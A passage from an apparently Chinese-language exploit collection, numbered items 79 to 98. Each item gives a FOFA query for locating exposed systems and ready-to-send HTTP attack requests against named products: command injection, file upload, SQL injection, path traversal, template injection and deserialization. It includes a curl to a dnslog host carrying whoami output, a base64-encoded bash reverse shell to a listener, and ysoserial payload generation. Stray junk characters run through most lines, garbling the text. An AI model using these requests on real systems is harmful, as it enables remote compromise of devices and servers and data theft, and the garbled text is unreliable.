0 ?" Y; {# |2 e- l. y9 X+ k2 sContent-Disposition: form-data; name="target"1 d" x% [) h6 W. F: j* A1 a
. P& m2 ]* G3 s& ~! b: L- F$ C
/Applications/SkillDevelopAndEHS/
8 o$ g8 q: P" m5 D6 s! F/ B------YsOxWxSvj1KyZow1PTsh98fdu6l--8 o* n6 K: o) A! \
: _0 t$ A8 f/ B
. {- Z+ X; u2 i$ i9 F8 E( O! ]
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
5 G; U$ F: }1 n' XHost: x.x.x.x6 A1 ?6 Y& K7 `6 O/ l6 j9 T
. Z( v# ^& D6 a1 H1 z3 K2 e1 Y* F2 `1 H8 j
79. BYTEVALUE 百为流控路由器远程命令执行2 |+ J" X% N% N
FOFA:BYTEVALUE 智能流控路由器9 G5 k; z; c) n9 N; X. K+ w
GET /goform/webRead/open/?path=|id HTTP/1.1) h3 t7 z, P' p7 @2 p
Host:IP
# p2 J) @* o# l5 y5 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
. j$ k4 S9 N! L7 D9 y# R. V- MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, [7 Q4 z! R+ X% W: F% ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' f% d3 s8 @# O
Accept-Encoding: gzip, deflate
3 k, }6 {; p# I# _1 t* z: NConnection: close+ v; N! `) f' z
Upgrade-Insecure-Requests: 1. R V \3 p) v9 X6 j
9 `( v G5 W2 k$ |2 s% c4 `) @- B+ S! m2 ]
( J: e: z0 q, p4 _80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
2 R6 x1 x7 X, F/ a: ]- JFOFA:app="速达软件-公司产品"
" q) h- [' S, @$ pPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1( L x+ l" n: C- {
Host: x.x.x.x( ?8 T) t. u, Y& b5 A. w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' ~. Q M* \5 Z9 B& @) pContent-Length: 272 U3 B' M: j E4 t1 ~ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 a( z7 {# |1 S6 C, pAccept-Encoding: gzip, deflate
7 Y3 E% o6 G4 C3 m. H! g: eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 W/ h3 B7 m. n* E7 h
Connection: close% g8 S% L. E* U+ A2 S! p: r
Content-Type: application/octet-stream
: n' N$ G0 v# R" g7 ~Upgrade-Insecure-Requests: 12 A: o" _" X' N- G
) U& c/ |! c( T: C<% out.print("oessqeonylzaf");%>8 ^0 v* t& r$ I) ]
0 g1 @# C9 \) H. B+ _# k4 p w1 Z0 B' Q% ]8 N
GET /xykqmfxpoas.jsp HTTP/1.10 X3 A2 C1 x) M# z! ^
Host: x.x.x.x& c: B, b0 X+ L6 ^/ O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 l2 L+ \1 y ]7 c0 J
Connection: close" e/ Z4 |) M: b5 \/ |0 C" n) n- j
Accept-Encoding: gzip1 N) F# `! e4 a) S
" l/ w& m, y) \& N! ?" `
4 `, C/ l2 c/ a$ M. F$ n81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
4 N5 ~' ~8 o' Y8 \FOFA:app="uniview-视频监控"! O- X# X8 y) r% \3 {# h7 P) U
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1& ], d, Q: o7 {/ S4 y
Host: x.x.x.x
L; T* B6 t5 b; E0 l! NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* c5 I! i3 ]- `$ n+ p
Connection: close
# l& D7 _- _+ f1 h) t" K; x5 `5 uAccept-Encoding: gzip' a- R: L6 o/ N
8 J' Z. P5 q) G& x: P8 Z) y6 q7 I2 f# t' b: h
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
/ R4 n( {3 j: I. `8 HFOFA:app="思福迪-LOGBASE"; f! h( q; b& g B
POST /bhost/test_qrcode_b HTTP/1.1. u! I7 }& `! e' N- t, M* Z m7 E
Host: BaseURL
3 {' q- r/ S- a) _4 O- N; J) LUser-Agent: Go-http-client/1.14 p; b; a. ]4 N
Content-Length: 23( `. t" c, {/ _) U# P
Accept-Encoding: gzip! K" d. }# `& D9 ]7 \
Connection: close* @3 u9 k( y) C$ n
Content-Type: application/x-www-form-urlencoded4 s1 V3 l7 H5 M% z/ x+ K
Referer: BaseURL
7 V+ u1 W: F! c( }" u* \- a
8 z* R M5 O, w4 P2 Sz1=1&z2="|id;"&z3=bhost5 t/ K, m/ Y; W, u- k
6 V6 {! F( s7 Q
& z8 l4 N* H, P" A4 |3 N- V2 p83. JeecgBoot testConnection 远程命令执行
0 D3 z6 U- e: t* `+ J, E: ?/ F/ }FOFA:title=="JeecgBoot 企业级低代码平台"7 O. N3 [- Z6 R* I1 g8 K
3 M% Y8 {# \9 p: h
' S8 h! P. L; t7 F* y/ a9 kPOST /jmreport/testConnection HTTP/1.17 s* F" |& u Y
Host: x.x.x.x
8 T# f E# C# r4 H# ^& YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 b( j' }! C/ p8 d% _2 UConnection: close/ |$ m' ?; c# O) p& U% ]2 m
Content-Length: 8881
" w p% H$ T7 A; V! m. i4 ~9 g: dAccept-Encoding: gzip
, j, O9 t7 D; p1 f- d* MCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"8 v/ t x( Y- q6 P3 Y* U
Content-Type: application/json
1 s3 s) I# \1 q( y J4 I* b" h% V) V" |* `8 B
PAYLOAD
* z L5 X( w2 @: Y! t1 W+ M& Z4 I! g# w% T/ {! H* t
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入8 A1 r1 H Y" z$ L$ g5 Q
FOFA:title=="JeecgBoot 企业级低代码平台"
; v: I2 N: ]+ M0 b" R
- [0 V; K6 o& n# j1 p2 Y6 K$ ?
- w$ e" a/ _, z8 L% O! V1 k, B8 Q5 x4 W5 Z
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
; D" n, E3 M. u) XHost: 192.168.40.130:80807 t. O. }7 j7 f4 [, P9 e
User-Agent: curl/7.88.15 N/ j2 }" x7 |& y* i9 k9 A8 n
Content-Length: 156 o: l7 \( y% E! {. {
Accept: */*
: M4 Z' |4 {2 H2 o7 D; Z( DConnection: close
1 F/ E2 B/ v+ s4 g. }% nContent-Type: application/json
5 i Z5 v+ z& s$ j) CAccept-Encoding: gzip
* o9 J9 M6 c$ w2 X$ s7 M
, G) q! c* V0 L" M( E: \/ B/ T) G{( Q& g1 Y. K' V5 D# g. K
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
# |% D& t2 C6 ~+ F' @ "type": "0"! y% \. ?4 g* X# H. `$ ^
}$ s: g' \+ e6 _& C
( ]$ a* ^7 S+ w( \% {; |& Z4 X- e
# M) @- N3 v3 U85. SysAid On-premise< 23.3.36远程代码执行
5 L6 Q% X0 ]1 P: _" ^* [9 n( b' UCVE-2023-472463 x% D& f$ V2 j( u& g
FOFA:body="sysaid-logo-dark-green.png"
- c/ }% l% _4 i; Q: E/ C HEXP数据包如下,注入哥斯拉马3 _* Y/ X) C, n2 y; d# _
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
+ c7 V- F0 i8 X+ S- j1 J$ R% yHost: x.x.x.x, s- W6 |* S. V0 F6 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ C2 n6 N8 n9 K- j' n0 W
Content-Type: application/octet-stream
' a7 X- u, Q3 @. z& rAccept-Encoding: gzip
; e% V+ V0 O( j, w* ~7 y- l# p( n k2 Y f1 n$ u" [3 K
PAYLOAD
2 _, y9 \$ g7 [3 O! p1 G5 L- K3 D/ ~( h6 ^+ r# T4 e* I0 g6 y4 O `% |& L
回显URL:http://x.x.x.x/userfiles/index.jsp0 n. a& n z6 P3 n$ _
8 {! }1 j# Y5 X! O. E- T* |86. 日本tosei自助洗衣机RCE
0 d. r; g. S$ g5 C( SFOFA:body="tosei_login_check.php"5 Q& D. L% J) Y
POST /cgi-bin/network_test.php HTTP/1.1
$ ^& L' T" z8 O/ k% M0 ?" ?Host: x.x.x.x
4 H) O K- Y3 yUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.362 d: i( h J& V' u) X/ F
Connection: close7 u& u# `: j4 x
Content-Length: 443 M; U; G; W$ ~: C/ ]- u) ^
Accept: */*; v8 Z/ B) @4 ]7 c
Accept-Encoding: gzip8 Y2 [# q% a. [9 J0 ^
Accept-Language: en
4 ^: t* J" S& z$ x/ bContent-Type: application/x-www-form-urlencoded% j. _2 y- C) h t" b2 f
" W; Z2 q3 E) o/ xhost=%0acat${IFS}/etc/passwd%0a&command=ping0 o9 S; W8 E6 _1 `7 ~6 V4 I* g
. C7 p1 D! V; a8 z
T1 A, \6 M: S7 i87. 安恒明御安全网关aaa_local_web_preview文件上传
) S$ ?. {3 M) {FOFA:title="明御安全网关"6 [3 g5 S5 V) h5 b1 Y7 w& `
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1* f8 w: n0 F; R0 z0 m% d8 J! n
Host: X.X.X.X* Q/ P7 ~) x" v: Z+ P) o8 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 J- e4 ?" }) [, k" vConnection: close
: x1 o& s, ]9 s) u$ bContent-Length: 198
1 Y1 p# D1 K1 n( I$ s1 G* YAccept-Encoding: gzip
1 f. ^5 e; g7 Q, u+ ], k- aContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
/ l+ [4 I6 c1 q/ r, N* `8 d* N- N% p. k! k# v& g. r
--qqobiandqgawlxodfiisporjwravxtvd5 L! G9 M8 t; v
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
1 [- q+ p; x- nContent-Type: text/plain
4 S* m* a: X0 r8 F9 P% h3 _% ?. m0 K" @' ]! T6 W
2ZqGNnsjzzU2GBBPyd8AIA7QlDq2 R' S$ I% s' m7 y
--qqobiandqgawlxodfiisporjwravxtvd--
1 S; G1 K% r; j5 Y4 l6 X
7 m: F5 G6 l* Y$ j1 G+ Q0 t) g6 _- v' N( ]
/jfhatuwe.php
# k$ z/ u, e/ h& h o( N1 D
6 j! ]4 K* s" S, U88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
4 x+ u* ?7 g; O" VFOFA:title="明御安全网关"2 m2 Q9 C) O- p; M" e9 i( P
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1! q# k) r, ?& h2 a3 r. v* f+ D3 }
Host: x.x.x.xx.x.x.x" b) q' R' D$ g7 u+ l5 k+ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 J$ b; Q- Z! e8 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 ?( c; d) B" X! n2 T1 f, d6 EAccept-Encoding: gzip, deflate
- I4 g7 u5 F4 i/ x; f5 a5 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! }5 \, k! u& }; v' K
Connection: close
# K3 `& y. p* c( b
; ^3 Q. C; [4 L7 U9 e0 Q! e) ^4 f8 c3 i) f# w7 M5 L+ @) p. C
/astdfkhl.php$ b. k7 ]9 y' [; T" z, ^. b V
- B- o# n9 v2 d8 c- g89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 d4 I7 g! R! o" }% P2 EFOFA:title="FE协作办公平台" || body="li_plugins_download"
# n; |! _% u) z- u: bPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
: h1 U2 h+ r* C6 }" fHost: x.x.x.x) F2 h6 _) v0 ^1 a I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) v: Z3 P: |' b! Y- Z+ C4 I
Connection: close
n( U. n6 W3 v$ x1 j- yContent-Length: 41
$ s2 w9 s! W3 d6 V; o# MContent-Type: application/x-www-form-urlencoded
2 c% X( W4 S2 ~+ P& J4 [4 FAccept-Encoding: gzip
+ T5 h; ?& t( _6 E- b# R& E2 m6 O6 S( V6 r' O
option=2&GUID=-1'+union+select+111*222--+
* U Z5 W3 J1 ]) Z9 F) b X0 ? G9 H, s, c* {6 R- n3 D9 z; \
. {* `4 n4 Q' z8 B90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
7 W1 l! ^+ i: `' `) dFOFA:icon_hash="-1830859634"
1 F' w" i- @7 U% EPOST /php/ping.php HTTP/1.1
7 v3 e! x/ h1 Q M, A7 u8 }Host: x.x.x.x
/ z! t! d1 T8 v' Z: A: N' [. }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
) {& @" W% b; R% m: e, ?' I, lContent-Length: 51
. c% @5 x3 j9 z0 }, S5 e- NAccept: application/json, text/javascript, */*; q=0.01' E+ O. _6 ^- J( O. r3 R, N
Accept-Encoding: gzip, deflate& j- L, C2 R: j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 c6 B' a2 H& h9 lConnection: close! `5 h0 F2 B; p% Z8 ?4 |# A( X
Content-Type: application/x-www-form-urlencoded
% j) n# c, @! e Q$ g/ F& e! @X-Requested-With: XMLHttpRequest
" @2 ^( [6 H% `
# e3 N9 _+ ^1 L3 \( ?, M9 m' ^jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
# C1 r' W# J" \* n9 K
" X: S+ o. M+ B
/ V. q& ~- x6 N4 f7 a1 ]91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
2 F/ q7 b( V0 [# M6 AFOFA:title="综合安防管理平台"3 p) b/ s5 @' P* A6 f0 ?& N: G
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
1 h8 x/ U1 _) p: A! h( j& w2 sHost: your-ip
# P# B+ d8 Z9 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& l) _* h `" {& H" | ~; KAccept-Encoding: gzip, deflate. s3 M* G' s9 Z: {# P; s& ~
Accept: */*- [ a! y! d. U1 ~1 f5 ]+ w7 P( |
Connection: keep-alive
# l2 [0 H& [6 ~/ z7 h5 [) G/ f$ f- \) V/ ]
* Y/ [5 ^1 n5 N5 m( h
4 O) y7 l' v! _: K- Q! `92. 海康威视运行管理中心session命令执行& q, ~5 Y* P6 V
Fastjson命令执行3 e3 i+ x% ^$ A7 T
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
1 ^+ A- l# h% e; ]POST /center/api/session HTTP/1.1
4 Y+ Z1 l. y SHost:
1 r% m# f+ Q. B& n9 CAccept: application/json, text/plain, */*
) `1 C6 ^* \( V9 s NAccept-Encoding: gzip, deflate
/ |5 @: Y' [4 ^! m3 Q1 Z( B0 kX-Requested-With: XMLHttpRequest
8 t3 U; _* F! y* r0 P0 d% \Content-Type: application/json;charset=UTF-8
, ?; T5 r; M1 |# g3 fX-Language-Type: zh_CN
3 d- T& P* p9 {" b0 h5 ~Testcmd: echo test
8 ~% X0 y8 g( E& j. G: rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
- l- C1 o( Z! o* o8 _ @. S9 V* u1 jAccept-Language: zh-CN,zh;q=0.95 D* b, @) \, E. b1 k2 M* S9 M: S
Content-Length: 5778( g3 D* O X% \" V" a1 z
- f! E0 I$ @9 f3 F+ LPAYLOAD
" K2 m* ?. [! W( k( T6 I: q4 d+ ~- Q8 h/ a e
2 l. i/ t; i& s5 d- U5 Q2 F93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" l6 u8 \( N/ @! G
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="6 z% q, v7 r+ n" R$ u
POST /?g=app_av_import_save HTTP/1.1
: C; [: n" `. ^5 {# oHost: x.x.x.x7 U! o4 x ]& S; s& j4 l7 |& \" q+ P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
. A! v. |6 }9 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 S) h8 u" G, O5 l" ?! W$ U
4 V5 b5 n, _& _: U5 |8 e7 N------WebKitFormBoundarykcbkgdfx
% Z" _' j& H! [' Q7 h# RContent-Disposition: form-data; name="MAX_FILE_SIZE": H. y; Z5 y1 l5 o4 J
! p& A. D7 k0 K4 {
10000000
% k" o8 A+ ^4 z" \ K7 e------WebKitFormBoundarykcbkgdfx
. z) S0 T5 W( D* T9 J) t, ]Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"2 |8 s; N5 j% ]% \& r
Content-Type: text/plain
: k% m. L5 V- W9 Z9 Z& j2 f# q" y
/ q1 C9 N3 _. G% wwagletqrkwrddkthtulxsqrphulnknxa* c4 D' ?+ M/ Z4 c$ s) X& A; {' V3 n. p
------WebKitFormBoundarykcbkgdfx
0 k4 r2 [+ x' x N0 b7 }6 AContent-Disposition: form-data; name="submit_post"
) @6 S/ A2 `! Q# _1 V5 D& `2 @$ E5 n& I1 {# o, T1 W
obj_app_upfile6 u. ~1 b& \9 _* U) C( Z
------WebKitFormBoundarykcbkgdfx1 \- _8 W8 f" j5 }
Content-Disposition: form-data; name="__hash__"
6 f5 @3 A$ g. ]7 p6 Y
# [7 }& n9 {: R1 l. K# n1 c! t0b9d6b1ab7479ab69d9f71b05e0e9445
/ c) f( P* E1 p% p7 g: D* I& F------WebKitFormBoundarykcbkgdfx--
. b, R+ q$ f! O9 l! [
" P. |9 g; f/ r7 Q* O
1 Y9 B1 f( F! PGET /attachements/xlskxknxa.txt HTTP/1.1+ Q5 A' V* W7 ^* ]7 x1 m
Host: xx.xx.xx.xx$ D; c" T7 K5 e/ s& p. u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* D/ ^; ]( A" O: `- K5 ~
$ Y2 d! R C& n0 O4 }4 W! _9 b$ c- u; e" g: q
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 ^8 B g- Z; E2 i( q
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
9 |9 v: w. o$ x( H2 S( U* p& qPOST /?g=obj_area_import_save HTTP/1.1
; _( Z' }0 U# X( K7 B* u3 RHost: x.x.x.x
* [, Q8 f* z. c; U3 A2 O8 y$ z% yContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt8 s+ n5 v) t, C+ \7 h O- Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& q b2 j& V/ u6 a6 B
. W% _8 a8 y" G) a9 E# u, t J------WebKitFormBoundarybqvzqvmt
2 P U7 Y4 P. ^+ MContent-Disposition: form-data; name="MAX_FILE_SIZE"# f7 H3 x& \0 y
, W' V9 C6 p, Z0 x3 k% p
10000000& ^6 l9 H* R6 ?( T, X) D& V7 E
------WebKitFormBoundarybqvzqvmt8 X% C& {0 g( [ |! H7 Q! U
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
. k: z8 b9 v# j/ R Y' ^& a* Y2 kContent-Type: text/plain
) j( G, F* E7 b; t# `. E2 A s/ r4 f! f" d
pxplitttsrjnyoafavcajwkvhxindhmu- e% d: L. ?/ W
------WebKitFormBoundarybqvzqvmt5 s* ~0 y, R, i9 O' j8 P
Content-Disposition: form-data; name="submit_post"
1 |% b( ^+ i) Y6 `6 X5 W' O& E! @0 [5 `3 B* J
obj_app_upfile4 g, D) ]( ~% T. r
------WebKitFormBoundarybqvzqvmt2 p4 m0 u( c: k0 t
Content-Disposition: form-data; name="__hash__"
/ e2 R) [) Q( h0 j* S) u5 r! U( _7 E) z
0b9d6b1ab7479ab69d9f71b05e0e9445$ X, d4 B) h" j0 Q- R2 Q+ C! ?
------WebKitFormBoundarybqvzqvmt--. a4 `5 i4 S* ^* l: c
! t6 t7 d( P& x( M8 W( P' y0 q- t7 |2 C4 m+ a# C& x" `- B
9 F5 M9 p& j3 Q* _, HGET /attachements/xlskxknxa.txt HTTP/1.1
' {# ]5 ?2 z, S. i8 S& j$ ~3 W( lHost: xx.xx.xx.xx
0 j; O) y8 U: H& iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: x3 k. k7 S! R s
: p V- ~( s1 }' b, G, p, \2 O/ h
( R; o0 w7 B5 \! N7 ~& _95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行. y; R4 _+ k+ c3 d; e1 q
CVE-2023-490701 N$ {% `# A8 z3 \/ U) O
FOFA:app="Apache_OFBiz"$ i5 L, X6 q. J
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 N: F( Z- Q8 M& |
Host: x.x.x.x
4 `% L; i3 p' M* q$ I- oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* l, V; z# N9 d: p( y& BConnection: close
+ e" z- z o6 V5 WContent-Length: 889
. k/ J4 ^! {' [! q4 X, ?9 VContent-Type: application/xml1 m3 e2 p* k% V2 t) ]
Accept-Encoding: gzip$ D- E+ E, n5 c2 |
- Z3 P; V. l* m8 \<?xml version="1.0"?>
* H! C5 G# k2 n; r& d<methodCall>
8 U F0 u- ^3 g% A2 A/ |6 B <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>! j) p1 W J U; e+ v1 f9 M' P
<params>
, ~% h |8 N4 T, X& J% q <param>3 u+ n' {+ W+ f7 b
<value>
, _# H3 B- q, ^: N9 A <struct>
: h9 ^9 v5 p* G9 g! a4 g/ f <member> u; L9 W* P) {
<name>test</name>
' |8 X4 ^2 ^3 z! e/ ^5 c) T6 g <value>
2 `' \5 ]+ u' U5 w5 o5 U* H3 l* [ <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>3 M3 |! \4 c6 q) D$ c
</value>
& v+ ?6 O" B# }2 \3 y0 H </member># A7 l% C) O4 c/ e: X4 T+ {% j4 c
</struct># m% G. n1 O1 A6 }8 P' [! E
</value>
$ h* {; s8 ~4 p! s6 [* T4 k. B </param>
& X1 u5 n) m6 g! D* t* I3 y7 C </params>
l2 M% w% ]3 N9 Z</methodCall>3 d0 h: b8 a/ l6 M" Q
4 [; }1 Q4 A8 B) n: i
6 U6 j2 V' m- d) {4 e7 x用ysoserial生成payload
9 c; M* N9 `3 p# h# {$ Y* _java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
l. |0 I0 E: M, v) p9 ~) ~' |# Q2 P
6 B. X _! N1 L3 u" y5 W! b+ Y' \3 t. h6 n( a, C7 Q
将生成的payload替换到上面的POC
. J: G* n0 W4 o# c+ P1 L+ Q0 WPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 O# C& L0 v, ~. H6 H% j
Host: 192.168.40.130:8443# C1 Q" j# r2 u/ v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 {9 I$ X( |- T
Connection: close( C, Q5 ~5 v: C8 h% J4 ]* v
Content-Length: 889
% A! j, I8 @0 | r. s! fContent-Type: application/xml
8 q3 g% ^/ N; ^Accept-Encoding: gzip% ~2 l. h4 r4 S6 s8 [6 x/ @
& Q' Q. N( Y# s2 S
PAYLOAD& c3 m' r0 K$ h6 x) O# h% h! w
/ E3 D0 c8 d; e# q) E# [3 f96. Apache OFBiz 18.12.11 groovy 远程代码执行
% C3 b1 K) ]& _9 j7 H4 SFOFA:app="Apache_OFBiz"
# {, c; }8 @+ P* k8 a9 JPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+ j) I+ T* P8 n3 t$ fHost: localhost:8443+ ^; ?6 v2 F$ @/ p! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: w8 s! [# _' t! g
Accept: */*
: c8 H& o+ d9 x/ D1 p5 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 \4 w" V! o+ v: ]; L" a
Content-Type: application/x-www-form-urlencoded- t" x& f3 g1 V7 X! s% k2 u$ C: C
Content-Length: 55: n/ p$ e' x- @- E2 p
3 N: x. ?/ \' H" C" c8 Q, sgroovyProgram=throw+new+Exception('id'.execute().text);
' x3 `) `( q/ \; r3 R, T$ Z& D3 |) i5 h. U
8 Z, |( g: c, j反弹shell; V- W6 r$ g2 f9 }
在kali上启动一个监听
. r4 j, l$ Y! L. r4 y' ~% wnc -lvp 77773 C+ ^# A2 n( ?9 m5 Q
' b2 H$ v$ q/ T
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 e8 `' J" m1 j) }
Host: 192.168.40.130:8443
+ n# Q1 H* {* l4 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& A7 F8 r8 ?" H; \Accept: */*
3 o% F! @, N9 Y, f6 w- ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 `, q+ l( T+ K7 B: B4 i
Content-Type: application/x-www-form-urlencoded. Z5 n* ]8 x$ V/ E8 z5 x5 l3 \+ D
Content-Length: 71
. C# E: E0 @- U, e$ D( c1 h. m% W" _2 J1 L, O' F
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();/ C9 k3 O( H( v2 | ^
! u _7 X6 n% Q4 S/ z
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
3 R$ s4 W* a) ]8 G( }FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"5 Z+ o( ?1 u" v- t
GET /passport/login/ HTTP/1.1
5 S0 W7 s8 [# d1 j( XHost: 192.168.40.130:8085
$ H0 |" `9 S' |6 }6 K8 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 W2 D+ x' v7 @Accept-Encoding: gzip
9 g: L8 T5 e, e* |4 mConnection: close" c3 \7 D* ]1 K. Z5 M6 P
Cookie: rememberMe=PAYLOAD
9 T* y( O9 B: b: X2 Z$ p, l* @X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
" x3 s! h% i. m9 a9 D5 F
. [6 @( f6 {) j! h& x+ {" P, l# ^
. e5 h6 a: y, s& U& y8 Q& Q* Q98. SpiderFlow爬虫平台远程命令执行, A, C5 ?2 m* U1 f8 w: b
CVE-2024-0195$ X; I$ r# g, Y& Y
FOFA:app="SpiderFlow"
1 u$ l0 N8 A% T, R# j. mPOST /function/save HTTP/1.1
" h$ ? s$ p9 Q% F' u6 C0 sHost: 192.168.40.130:80888 _0 `/ D' k0 C4 {8 P) E. \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 @3 I4 z: M" SConnection: close0 k$ x* Y- I& Z! d% [3 v$ h7 a
Content-Length: 121! V. e* s+ ~# p e$ g
